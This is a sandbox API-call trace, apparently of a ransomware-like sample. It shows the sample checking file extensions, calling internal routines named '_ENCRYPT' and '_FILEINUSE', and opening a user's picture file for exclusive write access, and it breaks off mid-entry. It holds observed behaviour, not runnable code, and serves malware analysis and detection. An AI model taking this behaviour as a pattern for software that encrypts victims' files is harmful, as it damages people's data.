PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0188.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.735] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0188.735] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.735] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.735] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.735] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.735] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.736] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0188.736] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.736] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.736] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0188.736] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2a9e, lpOverlapped=0x0) returned 1 [0188.736] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0188.736] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2a9e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.736] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0188.737] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0188.737] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.738] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.739] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.739] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.739] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.739] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.739] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.739] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.739] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\3tvbet hm8klbxn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.741] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0188.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.743] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.743] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.743] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.743] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.744] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.745] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.745] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.745] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.745] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.745] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.745] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.746] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.746] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe325e90, ftCreationTime.dwHighDateTime=0x1d5d907, ftLastAccessTime.dwLowDateTime=0x67965860, ftLastAccessTime.dwHighDateTime=0x1d5e2b2, ftLastWriteTime.dwLowDateTime=0x67965860, ftLastWriteTime.dwHighDateTime=0x1d5e2b2, nFileSizeHigh=0x0, nFileSizeLow=0x113c3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="3TvBEt HM8KLbxN.jpg", cAlternateFileName="3TVBET~1.JPG")) returned 0x90add8 [0188.746] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0188.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.747] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe325e90, ftCreationTime.dwHighDateTime=0x1d5d907, ftLastAccessTime.dwLowDateTime=0x67965860, ftLastAccessTime.dwHighDateTime=0x1d5e2b2, ftLastWriteTime.dwLowDateTime=0x67965860, ftLastWriteTime.dwHighDateTime=0x1d5e2b2, nFileSizeHigh=0x0, nFileSizeLow=0x113c3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="3TvBEt HM8KLbxN.jpg", cAlternateFileName="3TVBET~1.JPG")) returned 0x90add8 [0188.747] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0188.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt 